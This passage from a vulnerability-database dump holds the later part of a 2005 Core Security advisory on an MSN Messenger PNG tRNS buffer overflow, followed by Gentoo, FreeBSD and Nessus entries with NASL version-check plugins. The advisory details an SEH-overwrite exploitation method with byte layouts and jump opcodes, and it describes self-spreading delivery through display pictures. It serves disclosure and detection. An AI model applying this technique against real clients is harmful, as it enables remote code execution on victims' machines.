By building a longer buffer, data beyond\r\n the return address can be overwritten, including: function\r\n parameters, local variables and Structured Exception Handling records\r\n [5]. Due to the way errors are handled in the MSN Messenger client,\r\n an exception is raised after the overflow occurs but before any\r\n stack integrity verification is done. To process that exception the\r\n first SEH record in the exception handlers chain is used and, since\r\n this is located in the stack and near the overflowed buffer, the\r\n most obvious method to execute arbitrary code bypassing the\r\n protection seems to be overwriting the function pointer contained in\r\n that SEH record.\r\n\r\n To be precise, the exception is raised when the program tries to\r\n check the chunk's CRC32 and the exception code is 0xE06D7363.\r\n\r\n The tRNS chunk to accomplish the above strategy would look like the\r\n following:\r\n\r\n | chunk type |space for code|(1) SEH record | CRC32 |\r\n ["tRNS" 4 bytes][256+168 bytes ][next/eip: 8 bytes]\r\n\r\n The chunk type and crc32 fields are not copied into the stack.\r\n\r\n After taking control of the execution flow, [ESP+8] points to (1), so\r\n a possible structure for the fake SEH record could be:\r\n\r\n EB F9 ?? ?? XX XX XX XX\r\n\r\n Where EB F9 is the opcode for a jump to 5 bytes back, the next two\r\n bytes (?? ??) can have any value and the next 4 bytes are the address\r\n of a "jmp [esp+8]". In this way only a small portion of the program\r\n stack is modified and execution of arbitrary code is obtained.\r\n\r\n[Attack vectors]\r\n\r\n The vulnerability may be used to infect image files. 
This means that\r\n a valid PNG file could be modified to exploit vulnerable programs\r\n and still look like a harmless picture to other applications.
returns a valid filter expression value (-1, 0 or 1) [5].\r\n\r\n Since delivery of an attack does not rely on any noticeable or\r\n suspicious network traffic outside of the normal behavior for the\r\n application's protocol, the only suitable way of detection from a\r\n network point of view is with the use of a proxy, IPS or firewall\r\n system with the capability of interpreting and normalizing the MSN\r\n Messenger protocol. In lieu of a patched client, attack detection\r\n should be based on the identification of malformed PNG images in\r\n MSN Messenger protocol traffic.\r\n\r\n The known attack vectors can be used to deliver successful attacks\r\n that are unnoticeable to the end user, not disrupting the execution\r\n of the MSN Messenger client running on the victim's computer and\r\n using it as a vantage point to compromise other clients by 'infecting'\r\n the victim's display picture.\r\n In this manner the vulnerability can be used to launch massive\r\n attacks using the application's underlying communications protocol as\r\n a delivery vector.\r\n Therefore, understanding the technical attributes for exploitation\r\n is also highly relevant to detect and prevent attacks.\r\n\r\n[Plausible exploit implementations]\r\n\r\n The code to exploit a server vulnerability usually involves\r\n implementing a limited portion of a network protocol that are in\r\n general, standard and well documented. Knowledge about encodings,\r\n languages and file formats are also needed to exploit browser or mail\r\n client flaws. 
However, even in those cases, the implementation\r\n complexity is low.\r\n\r\n In this case, crafting the malformed PNG image file seems simple but\r\n delivering the image to the victim through the Messenger protocol is\r\n somewhat a more difficult task.\r\n\r\n Alternatives to implementing an entire messenger client are:\r\n\r\n 1) using the standard client application to send the image.\r\n 2) using an open source third party client.\r\n 3) using a messenger protocol proxy.\r\n\r\n 1. In order to send the image using the standard client, it must be\r\n previously patched and modified to accept the infected image file as\r\n a display picture, emoticon or any other desired image type.\r\n\r\n 2. The difference with the previous option is that the modifications\r\n can be made easily.\r\n\r\n 3. The idea behind using a proxy is to avoid modifying a client, and\r\n being able to synchronize the other stages of an attack, as well as\r\n the possibility of using the same communication channel to control\r\n the victim's computer.\r\n A messenger protocol proxy can be used both to inject malformed PNG\r\n images to deliver an attack, or to sanitize outgoing traffic to\r\n prevent exploitation of third parties system.\r\n\r\n[Proof of Concept exploit code]\r\n\r\n To check if a MSN Messenger client is vulnerable, users can\r\n download the PNG image provided in the following URL\r\n\r\n http://www.coresecurity.com/corelabs/advisories/msn-vulncheck.zip\r\n\r\n The PNG image was built to work with MSN Messenger 6.2.0137.\r\n Once downloaded and uncompressed, open MSN Messenger, go to\r\n Tools->"Change display picture..." 
and select the file.\r\n\r\n On vulnerable clients either a message box will be shown or\r\n MSN Messenger will crash.\r\n\r\n\r\n*References*\r\n\r\n [1] libPNG 1.2.5 stack-based buffer overflow and other code concerns\r\n http://scary.beasts.org/security/CESA-2004-001.txt\r\n\r\n [2] Multiple buffer overflows in libpng 1.2.5\r\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597\r\n\r\n [3] Portable Network Graphics (PNG) Specification and Extensions\r\n http://www.libpng.org/pub/png/spec/\r\n\r\n [4] MSDN Compiler Security Checks In Depth\r\n http://go.microsoft.com/fwlink/?Linkid=7260\r\n\r\n [5] Structured Exception Handling\r\n http://msdn.microsoft.com/library/en-us/debug/base/structured_exception_handling.asp \r\n\r\n http://www.microsoft.com/msj/0197/exception/exception.aspx\r\n http://msdn.microsoft.com/library/en-us/debug/base/using_an_exception_handler.asp\r\n\r\n [6] MSN Messenger protocol - display pictures\r\n http://www.hypothetic.org/docs/msn/phorum/read.php?f=1&i=7834&t=7834\r\n\r\n\r\n*About Core Security Technologies*\r\n\r\n Core Security Technologies develops strategic security solutions for\r\n Fortune 1000 corporations, government agencies and military\r\n organizations. The company offers information security software and\r\n services designed to assess risk and protect and manage information\r\n assets. 
Headquartered in Boston, MA, Core Security Technologies can\r\n be reached at 617-399-6980 or on the Web at\r\n http://www.coresecurity.com.\r\n\r\n To learn more about CORE IMPACT, the first comprehensive penetration\r\n testing product, visit:\r\n http://www.coresecurity.com/products/coreimpact\r\n\r\n*DISCLAIMER:*\r\n\r\n The contents of this advisory are copyright (c) 2005 CORE Security\r\n Technologies and may be distributed freely provided that no fee is\r\n charged for this distribution and proper credit is given.\r\n\r\n$Id: msn-png-advisory.txt,v 1.19 2005/02/08 19:14:02 iarce Exp $\r\n", "edition": 1, "modified": "2005-02-09T00:00:00", "published": "2005-02-09T00:00:00", "id": "SECURITYVULNS:DOC:7775", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:7775", "title": "[VulnWatch] CORE-2004-0819: MSN Messenger PNG Image Parsing Vulnerability", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "gentoo": [{"lastseen": "2016-09-06T19:46:23", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "edition": 1, "description": "### Background\n\nlibpng is a standard library used to process PNG (Portable Network Graphics) images. It is used by several other programs, including web browsers and potentially server processes. \n\n### Description\n\nlibpng contains numerous vulnerabilities including null pointer dereference errors and boundary errors in various functions. \n\n### Impact\n\nAn attacker could exploit these vulnerabilities to cause programs linked against the library to crash or execute arbitrary code with the permissions of the user running the vulnerable program, which could be the root user. \n\n### Workaround\n\nThere is no known workaround at this time. All users are encouraged to upgrade to the latest available version. 
\n\n### Resolution\n\nAll libpng users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv \">=media-libs/libpng-1.2.5-r8\"\n # emerge \">=media-libs/libpng-1.2.5-r8\"\n\nYou should also run revdep-rebuild to rebuild any packages that depend on older versions of libpng : \n \n \n # revdep-rebuild", "modified": "2004-08-05T00:00:00", "published": "2004-08-05T00:00:00", "id": "GLSA-200408-03", "href": "https://security.gentoo.org/glsa/200408-03", "type": "gentoo", "title": "libpng: Numerous vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-06T19:46:16", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0758", "CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598", "CVE-2004-0763"], "description": "### Background\n\nMozilla is a popular web browser that includes a mail and newsreader. Galeon and Epiphany are both web browsers that use gecko, the Mozilla rendering engine. Mozilla Firefox is the next-generation browser from the Mozilla project that incorporates advanced features that are yet to be incorporated into Mozilla. Mozilla Thunderbird is the next-generation mail client from the Mozilla project. \n\n### Description\n\nMozilla, Galeon, Epiphany, Mozilla Firefox and Mozilla Thunderbird contain the following vulnerabilities: \n\n * All Mozilla tools use libpng for graphics. This library contains a buffer overflow which may lead to arbitrary code execution.\n * If a user imports a forged Certificate Authority (CA) certificate, it may overwrite and corrupt the valid CA already installed on the machine.\n\nMozilla, Mozilla Firefox, and other gecko-based browsers also contain a bug in their caching which may allow the SSL icon to remain visible, even when the site in question is an insecure site. 
\n\n### Impact\n\nUsers of Mozilla, Mozilla Firefox, and other gecko-based browsers are susceptible to SSL certificate spoofing, a Denial of Service against legitimate SSL sites, crashes, and arbitrary code execution. Users of Mozilla Thunderbird are susceptible to crashes and arbitrary code execution via malicious e-mails. \n\n### Workaround\n\nThere is no known workaround for most of these vulnerabilities. All users are advised to upgrade to the latest available version. \n\n### Resolution\n\nAll users should upgrade to the latest stable version: \n \n \n # emerge sync\n \n # emerge -pv your-version\n # emerge your-version", "edition": 1, "modified": "2007-12-30T00:00:00", "published": "2004-08-23T00:00:00", "id": "GLSA-200408-22", "href": "https://security.gentoo.org/glsa/200408-22", "type": "gentoo", "title": "Mozilla, Firefox, Thunderbird, Galeon, Epiphany: New releases fix vulnerabilities", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "freebsd": [{"lastseen": "2019-05-29T18:35:14", "bulletinFamily": "unix", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "description": "\nChris Evans has discovered multiple vulnerabilities in libpng,\n\t which can be exploited by malicious people to compromise a\n\t vulnerable system or cause a DoS (Denial of Service).\n", "edition": 4, "modified": "2004-08-15T00:00:00", "published": "2004-08-04T00:00:00", "id": "F9E3E60B-E650-11D8-9B0A-000347A4FA7D", "href": "https://vuxml.freebsd.org/freebsd/f9e3e60b-e650-11d8-9b0a-000347a4fa7d.html", "title": "libpng stack-based buffer overflow and other code concerns", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2021-01-12T10:05:42", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several 
buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-08-05T00:00:00", "title": "Fedora Core 1 : libpng10-1.0.15-7 (2004-236)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libpng10-devel", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo", "p-cpe:/a:fedoraproject:fedora:libpng10"], "id": "FEDORA_2004-236.NASL", "href": "https://www.tenable.com/plugins/nessus/14207", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-236.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14207);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n 
script_xref(name:\"FEDORA\", value:\"2004-236\");\n\n script_name(english:\"Fedora Core 1 : libpng10-1.0.15-7 (2004-236)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000244.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ac9f2f21\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng10, libpng10-debuginfo and / or\nlibpng10-devel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng10-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = 
get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^1([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 1.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC1\", reference:\"libpng10-1.0.15-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng10-debuginfo-1.0.15-7\")) flag++;\nif (rpm_check(release:\"FC1\", reference:\"libpng10-devel-1.0.15-7\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libpng10 / libpng10-debuginfo / libpng10-devel\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T11:51:21", "description": "Chris Evans discovered numerous vulnerabilities in the libpng graphics\nlibrary, including a remotely exploitable stack-based buffer overrun\nin the png_handle_tRNS function, dangerous code in png_handle_sBIT, a\npossible NULL pointer crash in png_handle_iCCP (which is also\nduplicated in multiple other locations), a theoretical integer\noverflow in png_read_png, and integer overflows during progressive\nreading.\n\nAll users are encouraged to upgrade immediately.", "edition": 24, "published": "2004-08-22T00:00:00", "title": "Mandrake Linux Security Advisory : libpng (MDKSA-2004:079)", "type": "nessus", "bulletinFamily": 
"scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-22T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:libpng3", "cpe:/o:mandrakesoft:mandrake_linux:9.1", "p-cpe:/a:mandriva:linux:lib64png3-static-devel", "p-cpe:/a:mandriva:linux:libpng3-devel", "p-cpe:/a:mandriva:linux:lib64png3", "cpe:/o:mandrakesoft:mandrake_linux:10.0", "cpe:/o:mandrakesoft:mandrake_linux:9.2", "p-cpe:/a:mandriva:linux:lib64png3-devel", "p-cpe:/a:mandriva:linux:libpng3-static-devel"], "id": "MANDRAKE_MDKSA-2004-079.NASL", "href": "https://www.tenable.com/plugins/nessus/14328", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandrake Linux Security Advisory MDKSA-2004:079. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14328);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2004-0597\", \"CVE-2004-0598\", \"CVE-2004-0599\");\n script_xref(name:\"CERT\", value:\"160448\");\n script_xref(name:\"CERT\", value:\"236656\");\n script_xref(name:\"CERT\", value:\"286464\");\n script_xref(name:\"CERT\", value:\"388984\");\n script_xref(name:\"CERT\", value:\"477512\");\n script_xref(name:\"CERT\", value:\"817368\");\n script_xref(name:\"MDKSA\", value:\"2004:079\");\n\n script_name(english:\"Mandrake Linux Security Advisory : libpng (MDKSA-2004:079)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Mandrake Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Evans discovered numerous vulnerabilities in the libpng graphics\nlibrary, including a remotely exploitable stack-based 
buffer overrun\nin the png_handle_tRNS function, dangerous code in png_handle_sBIT, a\npossible NULL pointer crash in png_handle_iCCP (which is also\nduplicated in multiple other locations), a theoretical integer\noverflow in png_read_png, and integer overflows during progressive\nreading.\n\nAll users are encouraged to upgrade immediately.\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:lib64png3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpng3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpng3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:libpng3-static-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:10.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandrakesoft:mandrake_linux:9.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, 
Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64png3-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64png3-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"amd64\", reference:\"lib64png3-static-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libpng3-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libpng3-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK10.0\", cpu:\"i386\", reference:\"libpng3-static-devel-1.2.5-10.5.100mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libpng3-1.2.5-2.5.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libpng3-devel-1.2.5-2.5.91mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.1\", cpu:\"i386\", reference:\"libpng3-static-devel-1.2.5-2.5.91mdk\", yank:\"mdk\")) flag++;\n\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", 
reference:\"lib64png3-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64png3-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"amd64\", reference:\"lib64png3-static-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libpng3-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libpng3-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\nif (rpm_check(release:\"MDK9.2\", cpu:\"i386\", reference:\"libpng3-static-devel-1.2.5-7.5.92mdk\", yank:\"mdk\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-12T10:05:42", "description": "The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). 
An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2004-08-05T00:00:00", "title": "Fedora Core 1 : libpng-1.2.5-7 (2004-237)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2004-0599", "CVE-2004-0597", "CVE-2004-0598"], "modified": "2004-08-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:libpng-debuginfo", "cpe:/o:fedoraproject:fedora_core:1", "p-cpe:/a:fedoraproject:fedora:libpng-devel", "p-cpe:/a:fedoraproject:fedora:libpng"], "id": "FEDORA_2004-237.NASL", "href": "https://www.tenable.com/plugins/nessus/14208", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2004-237.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(14208);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2004-0597\");\n script_xref(name:\"FEDORA\", value:\"2004-237\");\n\n script_name(english:\"Fedora Core 1 : libpng-1.2.5-7 (2004-237)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora Core host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The libpng package contains a library of functions for creating and\nmanipulating PNG (Portable Network Graphics) image 
format files.\n\nDuring a source code audit, Chris Evans discovered several buffer\noverflows in libpng. An attacker could create a carefully crafted PNG\nfile in such a way that it would cause an application linked with\nlibpng to execute arbitrary code when the file was opened by a victim.\nThe Common Vulnerabilities and Exposures project (cve.mitre.org) has\nassigned the name CVE-2004-0597 to these issues. \n\nIn addition, this audit discovered a potential NULL pointer\ndereference in libpng (CVE-2004-0598) and several integer overflow\nissues (CVE-2004-0599). An attacker could create a carefully crafted\nPNG file in such a way that it would cause an application linked with\nlibpng to crash when the file was opened by the victim.\n\nRed Hat would like to thank Chris Evans for discovering these issues.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/announce/2004-August/000245.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?27a65410\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected libpng, libpng-debuginfo and / or libpng-devel\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-debuginfo\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:libpng-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora_core:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2004/08/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2004/08/05\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release 